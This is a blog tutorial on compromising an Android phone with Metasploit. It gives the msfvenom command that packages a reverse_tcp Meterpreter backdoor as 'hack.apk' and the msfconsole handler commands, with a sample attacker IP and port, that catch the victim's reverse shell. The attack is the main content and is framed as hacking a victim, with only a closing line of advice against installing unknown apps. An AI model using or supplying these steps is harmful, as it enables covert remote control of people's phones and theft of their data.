Hacking Android Phone Using Metasploit. a tool for creating exploits for the remote victims and it has a whole list of exploits available in Metasploit.

Step By Step Hacking Android Phone Using Metasploit

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon

Hacking Android Phone Using Metasploit

What is Metasploit?

Step By Step Hacking Android Phone Using Metasploit.  Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words it is an Open Source Framework. A tool for creating exploits for the remote victims and it also has a whole list of exploits readily available in Metasploit Framework.

 

So now lets get into it.

  1. Open Terminal.
  2. We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Generate Android Payload using msfvenom

Let me explain the above Command so we are using msfvenom  as the exploit generator. Also, for and android using Meterpreter for the reverse connection to the attackers system. LHOST defines the attackers ip address. Where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444. And R > is used to generate the executable.

Hacking Android Phone Using Metasploit

MSFVenom Payload

Now we are all ready for the next step as this payload use reverse_tcp. So the attacker will be listening to the port specified in the payload for a reverse connection from the victim.

So now we need to set up handler to handle incoming connections to the port let’s do it. Hacking Android Phone Using Metasploit.

root@kali:~/# msfconsole

use exploit/multi/handler set payload android/meterpreter/reverse_tcp

Now we will listen to the connections which are being received on the attacker system.

set lhost 192.168.1.104 set lport 4444 exploit 

Remember that the LHOST & LPORT are going to be the attacker IP address. And port to listen the reverse connection. and exploit to start listening.

ALSO READ  Learn to Hack Instagram utilizing Kali Linux 2017.1

Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.

Here we have some information that we have extracted from the android system. And so the victims phone have been completely owned.

The successful hack dance  😈  😈

 

So after all this explanation what we have learned is never install apps. Also, from unknown sources 😀 or else you are completely screwed :3

Here is the Video Covering all the steps :-

 

If you had any questions do comment below and we will try our best to help you out. Do share with your friends.

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon